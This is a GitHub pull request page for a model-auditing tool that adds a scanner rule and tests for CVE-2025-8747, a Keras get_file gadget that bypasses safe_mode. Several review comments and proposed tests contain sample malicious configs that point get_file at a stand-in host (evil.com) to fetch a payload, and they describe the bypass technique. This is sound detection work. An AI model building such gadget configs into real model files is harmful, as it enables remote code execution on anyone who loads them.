feat(security): detect CVE-2025-8747 get_file gadget bypass #602
yash2998chhabria merged 10 commits into main
Walkthrough
Adds CVE-2025-8747 detection to the Keras ZIP scanner by scanning config.json nodes for get_file references that appear together with URL strings in the same context.
Sequence Diagram
sequenceDiagram
participant Scanner as Keras ZIP Scanner
participant Parser as Config Parser
participant Iterator as Node Iterator
participant Matcher as Regex Matcher
participant Explanation as Explanation Function
participant Result as Result Collector
Scanner->>Parser: extract & parse config.json from ZIP
Parser-->>Scanner: config_data (dict/list)
Scanner->>Iterator: traverse config_data nodes
Iterator->>Matcher: present node/string values
Matcher-->>Iterator: match _GET_FILE_PATTERN?
alt get_file matched
Iterator->>Matcher: check for _URL_PATTERN in related nodes
Matcher-->>Iterator: URL matched?
alt URL matched in same context
Iterator->>Explanation: get_cve_2025_8747_explanation("get_file_gadget")
Explanation-->>Iterator: explanation text
Iterator->>Result: emit CRITICAL issue with CVE metadata
end
end
Scanner-->>Result: finalize and return scan results
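The flow in the diagram can be sketched roughly as follows. This is a minimal illustration, not the code from the PR: the two regexes, `iter_dict_nodes`, and `find_get_file_gadgets` are hypothetical stand-ins, since the real `_GET_FILE_PATTERN`, `_URL_PATTERN`, and scanner methods are not shown in this conversation.

```python
import json
import re
from typing import Any, Iterator

# Assumed patterns; the PR's actual _GET_FILE_PATTERN / _URL_PATTERN may differ.
GET_FILE_PATTERN = re.compile(r"(?:keras\.utils\.)?get_file", re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)


def iter_dict_nodes(data: Any, path: str = "root") -> Iterator[tuple[str, dict[str, Any]]]:
    """Yield (path, dict) for every dict nested anywhere inside data."""
    if isinstance(data, dict):
        yield path, data
        for key, value in data.items():
            yield from iter_dict_nodes(value, f"{path}.{key}")
    elif isinstance(data, list):
        for index, item in enumerate(data):
            yield from iter_dict_nodes(item, f"{path}[{index}]")


def find_get_file_gadgets(config_text: str) -> list[str]:
    """Return paths of dict nodes whose direct string values hold both get_file and a URL."""
    hits: list[str] = []
    for path, node in iter_dict_nodes(json.loads(config_text)):
        strings = [value for value in node.values() if isinstance(value, str)]
        has_get_file = any(GET_FILE_PATTERN.fullmatch(s.strip()) for s in strings)
        has_url = any(URL_PATTERN.search(s) for s in strings)
        # Both signals must appear in the same node to count as a match.
        if has_get_file and has_url:
            hits.append(path)
    return hits
```

Requiring both signals in the same dict node is what keeps a config that mentions `get_file` in one place and a URL somewhere unrelated from being flagged.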
Estimated code review effort: 🎯 3 (Moderate) | ⏱️ ~25 minutes
Pre-merge checks: ✅ 3 passed
Actionable comments posted: 2
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@CHANGELOG.md`:
- Around line 8-12: There is a duplicate "[Unreleased]" section; remove the
duplicate block containing "### Security" and the bullet "- **keras:** detect
CVE-2025-8747 get_file gadget safe_mode bypass", then merge that bullet into the
existing "[Unreleased]" section by adding it under the existing "### Security"
subsection (or create "### Security" there if it doesn't exist) so only one
"[Unreleased]" header remains.
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 422-431: The helper _make_keras_zip in class
TestCVE20258747GetFileGadget uses os.path.join(str(tmp_path), "model.keras");
change it to use pathlib by constructing the path with tmp_path / "model.keras"
and update any uses that expect a str (e.g., pass str(path) to zipfile.ZipFile
if needed) so the temporary path handling is consistent with other tests.
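A pathlib-based version of such a helper might look like the sketch below. It is written as a free function named `make_keras_zip` for illustration; the real `_make_keras_zip` method body is not shown here, and writing only `config.json` into the archive is an assumption.

```python
import zipfile
from pathlib import Path


def make_keras_zip(config_str: str, tmp_path: Path) -> str:
    """Write a minimal .keras archive holding only config.json and return its path."""
    # Path / str builds the file path without os.path.join.
    path = tmp_path / "model.keras"
    # zipfile.ZipFile accepts path-like objects, so no str() is needed here.
    with zipfile.ZipFile(path, "w") as archive:
        archive.writestr("config.json", config_str)
    # Return a str for callers that expect a plain string path.
    return str(path)
```

In a pytest test, the `tmp_path` fixture already provides a `pathlib.Path`, so it can be passed straight through.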
ℹ️ Review info
Configuration used: Repository UI
Review profile: ASSERTIVE
Plan: Pro
Disabled knowledge base sources:
- Linear integration is disabled
You can enable these sources in your CodeRabbit configuration.
📒 Files selected for processing (5)
- CHANGELOG.md
- modelaudit/config/explanations.py
- modelaudit/scanners/keras_zip_scanner.py
- tests/conftest.py
- tests/scanners/test_keras_zip_scanner.py
Actionable comments posted: 1
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 422-431: The _make_keras_zip helper in
TestCVE20258747GetFileGadget is missing a type hint for the tmp_path parameter;
add a proper annotation (e.g., tmp_path: pathlib.Path or from pathlib import
Path then tmp_path: Path) to the method signature and ensure pathlib.Path is
imported at the top of the test file so the type hint resolves.
📒 Files selected for processing (2)
- CHANGELOG.md
- tests/scanners/test_keras_zip_scanner.py
Actionable comments posted: 1
♻️ Duplicate comments (1)
tests/scanners/test_keras_zip_scanner.py (1)
425-505: ⚠️ Potential issue | 🟡 Minor
Add missing type hints in the new CVE test class methods.
Line 425 and Lines 433-505 introduce untyped `tmp_path` parameters (and no `-> None` on test methods), which violates the repository typing rule.
🔧 Proposed fix
 import base64
 import json
 import os
 import tempfile
 import zipfile
+from pathlib import Path
@@
-    def _make_keras_zip(self, config_str: str, tmp_path) -> str:
+    def _make_keras_zip(self, config_str: str, tmp_path: Path) -> str:
@@
-    def test_get_file_with_url_detected(self, tmp_path):
+    def test_get_file_with_url_detected(self, tmp_path: Path) -> None:
@@
-    def test_get_file_without_url_no_trigger(self, tmp_path):
+    def test_get_file_without_url_no_trigger(self, tmp_path: Path) -> None:
@@
-    def test_no_false_positive_normal_config(self, tmp_path):
+    def test_no_false_positive_normal_config(self, tmp_path: Path) -> None:
@@
-    def test_get_file_and_url_in_different_contexts_not_flagged(self, tmp_path):
+    def test_get_file_and_url_in_different_contexts_not_flagged(self, tmp_path: Path) -> None:
@@
-    def test_cve_attribution_details(self, tmp_path):
+    def test_cve_attribution_details(self, tmp_path: Path) -> None:
Verification script:
#!/bin/bash
python - <<'PY'
import ast
from pathlib import Path

path = Path("tests/scanners/test_keras_zip_scanner.py")
tree = ast.parse(path.read_text())
for node in ast.walk(tree):
    if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
        for arg in node.args.args:
            if arg.arg == "tmp_path" and arg.annotation is None:
                print(f"{path}:{node.lineno} {node.name} -> tmp_path missing annotation")
PY
As per coding guidelines: "Always include type hints in Python code."
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@tests/scanners/test_keras_zip_scanner.py` around lines 425 - 505, The tests test_get_file_with_url_detected, test_get_file_without_url_no_trigger, test_no_false_positive_normal_config, and test_get_file_and_url_in_different_contexts_not_flagged are missing type hints for the tmp_path parameter and their return type; update each function signature to annotate tmp_path (e.g., tmp_path: Path | pytest.TempPathFactory or appropriate project convention) and add an explicit return type -> None so all functions comply with the repository typing rule.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 273-281: The detection only inspects direct string values from the
mapping `node.values()` (variable `string_values`) and thus misses
list/tuple-valued gadget args like {"fn":"get_file","args":["https://..."]};
update the logic around `string_values`, `has_get_file`, and `has_url` so you
also extract and include strings found inside lists/tuples (and nested simple
containers) that are values of `node` before performing the `_GET_FILE_PATTERN`
and `_URL_PATTERN` checks; ensure you still use `_GET_FILE_PATTERN.fullmatch`,
the ".get_file" suffix check, and "keras.utils.get_file" substring check for any
discovered string entries so the `if not (has_get_file and has_url):` branch
behavior is preserved.
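One way to collect strings from list- and tuple-valued arguments is sketched below. The names `collect_strings` and `node_strings` and the `max_depth` limit are illustrative assumptions, not the helpers used in the repository. The sketch deliberately does not descend into nested dicts, so each dict node keeps its own context.

```python
from typing import Any


def collect_strings(value: Any, max_depth: int = 4) -> list[str]:
    """Collect strings from value, descending into lists and tuples only."""
    if isinstance(value, str):
        return [value]
    if isinstance(value, (list, tuple)) and max_depth > 0:
        found: list[str] = []
        for item in value:
            found.extend(collect_strings(item, max_depth - 1))
        return found
    # Dicts and other types are skipped: nested dicts are separate nodes.
    return []


def node_strings(node: dict[str, Any]) -> list[str]:
    """Return every string held directly or inside list/tuple values of node."""
    strings: list[str] = []
    for value in node.values():
        strings.extend(collect_strings(value))
    return strings
```

With this, a node such as `{"fn": "get_file", "args": ["https://..."]}` exposes both the function name and the URL to the pattern checks.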
---
Duplicate comments:
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 425-505: The tests test_get_file_with_url_detected,
test_get_file_without_url_no_trigger, test_no_false_positive_normal_config, and
test_get_file_and_url_in_different_contexts_not_flagged are missing type hints
for the tmp_path parameter and their return type; update each function signature
to annotate tmp_path (e.g., tmp_path: Path | pytest.TempPathFactory or
appropriate project convention) and add an explicit return type -> None so all
functions comply with the repository typing rule.
📒 Files selected for processing (2)
- modelaudit/scanners/keras_zip_scanner.py
- tests/scanners/test_keras_zip_scanner.py
Actionable comments posted: 2
♻️ Duplicate comments (1)
modelaudit/scanners/keras_zip_scanner.py (1)
272-282: ⚠️ Potential issue | 🟠 Major
Detection misses strings nested in list/tuple values.
At line 273, `string_values` extracts only direct string values from `node.values()`. Gadget configurations like {"fn": "get_file", "args": ["https://evil.com"]} will not trigger detection because the URL is inside a list, not a direct dict value.
🔧 Proposed fix to extract strings from list/tuple values
 for context, node in self._iter_dict_nodes(model_config):
     string_values = [value for value in node.values() if isinstance(value, str)]
+    # Also extract strings from list/tuple values in the same context
+    for value in node.values():
+        if isinstance(value, (list, tuple)):
+            string_values.extend(item for item in value if isinstance(item, str))
     has_get_file = any(
         _GET_FILE_PATTERN.fullmatch(value.strip()) is not None
         or value.strip().lower().endswith(".get_file")
Based on learnings: "Preserve or strengthen security detections; test both benign and malicious samples when modifying scanners".
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@modelaudit/scanners/keras_zip_scanner.py` around lines 272 - 282, The current detection in the loop over self._iter_dict_nodes(model_config) only collects direct string values into string_values so URLs inside list/tuple arguments are missed; update the extraction logic used where string_values is built (in the for context, node loop in keras_zip_scanner.py) to also iterate list/tuple values and collect any str items (or recursively flatten one level) into string_values before running the existing checks with _GET_FILE_PATTERN and _URL_PATTERN, preserving the same has_get_file and has_url checks; update/extend unit tests for the scanner to include cases like {"fn":"get_file","args":["https://evil.com"]} to ensure detection still triggers.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 304-316: The docstring for _iter_dict_nodes currently says "Yield
all dict nodes" but the function returns a list; update the docstring to
accurately describe its behavior (e.g., "Return a list of all dict nodes with
their traversal path") so it matches the implementation in the _iter_dict_nodes
method.
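For illustration, a list-returning traversal with a matching docstring could look like the following. This is a sketch under assumptions: the function is shown standalone rather than as the `_iter_dict_nodes` method, and the path format and stack-based traversal order are invented for the example.

```python
from typing import Any


def iter_dict_nodes(data: Any) -> list[tuple[str, dict[str, Any]]]:
    """Return a list of all dict nodes with their traversal path."""
    # Declared once, with its annotation, before any branching.
    nodes: list[tuple[str, dict[str, Any]]] = []
    stack: list[tuple[str, Any]] = [("root", data)]
    while stack:
        path, current = stack.pop()
        if isinstance(current, dict):
            nodes.append((path, current))
            stack.extend((f"{path}.{key}", value) for key, value in current.items())
        elif isinstance(current, list):
            stack.extend((f"{path}[{i}]", item) for i, item in enumerate(current))
    return nodes
```

Because the function builds and returns a list, "Return" describes it more accurately than "Yield", which suggests a generator.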
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 434-457: Add a sibling test case in
test_get_file_with_url_detected that covers the list-argument variant: construct
a config where the layer's "config" uses "fn": "get_file" and an "args" list
containing the URL (e.g., "args": ["https://evil.com/payload.bin"]), feed it
through the existing KerasZipScanner via self._make_keras_zip, then assert that
the result includes a CVE-2025-8747 issue and that its severity equals
IssueSeverity.CRITICAL (same expectations as the original test); place the new
assertions alongside the originals in the test_get_file_with_url_detected
function so it becomes a regression test for list-valued args handling.
---
Duplicate comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 272-282: The current detection in the loop over
self._iter_dict_nodes(model_config) only collects direct string values into
string_values so URLs inside list/tuple arguments are missed; update the
extraction logic used where string_values is built (in the for context, node
loop in keras_zip_scanner.py) to also iterate list/tuple values and collect any
str items (or recursively flatten one level) into string_values before running
the existing checks with _GET_FILE_PATTERN and _URL_PATTERN, preserving the same
has_get_file and has_url checks; update/extend unit tests for the scanner to
include cases like {"fn":"get_file","args":["https://evil.com"]} to ensure
detection still triggers.
📒 Files selected for processing (3)
- CHANGELOG.md
- modelaudit/scanners/keras_zip_scanner.py
- tests/scanners/test_keras_zip_scanner.py
Actionable comments posted: 4
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 294-301: Add a "description" entry to the details dict for
CVE-2025-8747 so the CVE output matches other detections; locate the block that
builds details = { "cve_id": "CVE-2025-8747", ... } and add a concise
description string (e.g., describing arbitrary code execution via unsafe
deserialization in Keras versions 3.0.0–3.10.0) alongside the existing keys
"cvss", "cwe", and "remediation".
- Around line 272-283: The scanner currently flags dict nodes if any extracted
string contains both get_file-like patterns and URLs, but this produces false
positives when the node is mostly documentation; update the loop in the
model_config inspection (the block iterating with _iter_dict_nodes) to first
call _is_primarily_documentation(context or node) and skip evaluating the CVE
condition for nodes where _is_primarily_documentation(...) returns True,
otherwise continue with the existing extraction via _extract_string_literals and
the checks using _GET_FILE_PATTERN and _URL_PATTERN; ensure you reference the
same helper names (_iter_dict_nodes, _extract_string_literals,
_is_primarily_documentation, _GET_FILE_PATTERN, _URL_PATTERN) and keep behavior
unchanged for non-documentation nodes.
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 434-553: All new test methods (test_get_file_with_url_detected,
test_get_file_with_url_in_args_list_detected,
test_get_file_without_url_no_trigger, test_no_false_positive_normal_config,
test_get_file_and_url_in_different_contexts_not_flagged,
test_cve_attribution_details) must annotate their tmp_path parameter as
tmp_path: Path and declare a return type -> None; update each function signature
accordingly and ensure Path is imported from pathlib at the top of the test file
if not present.
- Around line 423-557: Add a regression test in the TestCVE20258747GetFileGadget
class that verifies a malicious payload embedding a single comment token does
not suppress detection: implement a new test method (e.g.
test_get_file_with_url_and_comment_token_detected) that builds a config using
_make_keras_zip with a layer config containing "fn": "get_file" and a "url"
value that includes a single comment token embedded in the payload string, call
KerasZipScanner().scan(...) and assert that at least one issue references
"CVE-2025-8747", that the issue details["cve_id"] == "CVE-2025-8747", and that
the issue severity equals IssueSeverity.CRITICAL to ensure the scanner still
flags the case.
📒 Files selected for processing (5)
- CHANGELOG.md
- modelaudit/config/explanations.py
- modelaudit/scanners/keras_zip_scanner.py
- tests/conftest.py
- tests/scanners/test_keras_zip_scanner.py
2beae8d to 097b702
…bypass

Bypass of CVE-2025-1550 fix. Uses keras.utils.get_file as a gadget to download and execute arbitrary files even with safe_mode=True. Detected when config.json references get_file AND contains URL strings.

- Add _check_get_file_gadget() to keras_zip_scanner
- Flag get_file + URL combo as CRITICAL
- Add explanation function for CVE-2025-8747
- 4 new tests (detection, no URL no trigger, no false positive, attribution)

Co-Authored-By: Claude <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
- Fix nodes variable redefinition in _iter_dict_nodes(): declare nodes once before branches with type annotation, use plain assignment inside
- Add tmp_path: Path annotation to _make_keras_zip() in test file and import Path from pathlib
- Move [Unreleased] section before [0.2.26] in CHANGELOG and merge both Added and Fixed subsections under a single header

Co-Authored-By: Claude <noreply@anthropic.com>
…lict

The merge from main incorrectly deleted all CVE-2025-49655 TorchModuleWrapper detection code. This commit restores:

- _check_torch_module_wrapper and _is_vulnerable_keras_3_11_x methods
- get_cve_2025_49655_explanation function in explanations.py
- keras_version extraction from metadata.json
- TorchModuleWrapper detection in layer iteration loop
- CHANGELOG and conftest.py entries that were incorrectly removed
- Strengthened test assertions for cvss and remediation fields

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Co-Authored-By: Claude <noreply@anthropic.com>
2cbccb3 to fdf4d49
Summary
- Uses `keras.utils.get_file` as a gadget to download and execute arbitrary files even with `safe_mode=True`
- Detects `get_file` references combined with URL patterns (`http://` / `https://`)
Changes
- `modelaudit/scanners/keras_zip_scanner.py`: Add `_check_get_file_gadget()` method
- `modelaudit/config/explanations.py`: Add `get_cve_2025_8747_explanation()` function
- `tests/scanners/test_keras_zip_scanner.py`: 4 new tests
- `tests/conftest.py`: Add keras_zip tests to Python 3.12 allowlist
- `CHANGELOG.md`: Add unreleased entry
Test plan
🤖 Generated with Claude Code
Summary by CodeRabbit
Security
Tests
Changelog